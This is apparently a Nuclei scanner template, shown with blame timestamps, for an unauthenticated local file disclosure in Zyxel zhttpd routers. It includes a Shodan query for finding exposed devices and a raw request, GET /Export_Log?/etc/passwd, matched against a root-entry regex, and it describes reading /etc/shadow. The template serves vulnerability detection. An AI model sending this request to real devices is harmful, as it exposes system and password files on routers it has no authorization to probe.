2022-12-15 19:01:01 +00:00
id : unauth-lfd-zhttpd
2022-12-15 13:32:26 +00:00
info :
2022-12-16 03:11:31 +00:00
name : zhttpd - Unauthenticated Local File Disclosure
2022-12-15 13:32:26 +00:00
author : EvergreenCartoons
2022-12-15 19:01:01 +00:00
severity : high
2022-12-15 19:12:12 +00:00
description : |
An endpoint in zhttpd can be used to expose system files including "/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior login. An attacker can read all files on the system by using this endpoint.
2022-12-15 13:32:26 +00:00
reference :
- https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
- https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/
- https://github.com/rapid7/metasploit-framework/pull/17388
2022-12-15 19:01:01 +00:00
metadata :
verified : "true"
shodan-query : http.html:"VMG1312-B10D"
2023-01-05 11:21:19 +00:00
tags : misconfig,unauth,zyxel,lfi,msf
2022-12-15 13:32:26 +00:00
requests :
- raw :
- |
GET /Export_Log?/etc/passwd HTTP/1.1
Host : {{Hostname}}
Accept : */*
2022-12-15 19:01:01 +00:00
2022-12-15 13:32:26 +00:00
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- "root:.*:0:0:"
2022-12-15 19:01:01 +00:00
- type : word
part : header
words :
- 'application/octet-stream'
2022-12-15 13:32:26 +00:00
- type : status
status :
- 200